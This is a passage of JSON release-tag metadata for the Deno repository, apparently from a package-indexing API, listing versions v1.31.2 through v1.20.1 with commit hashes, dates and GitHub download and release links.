enoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c08675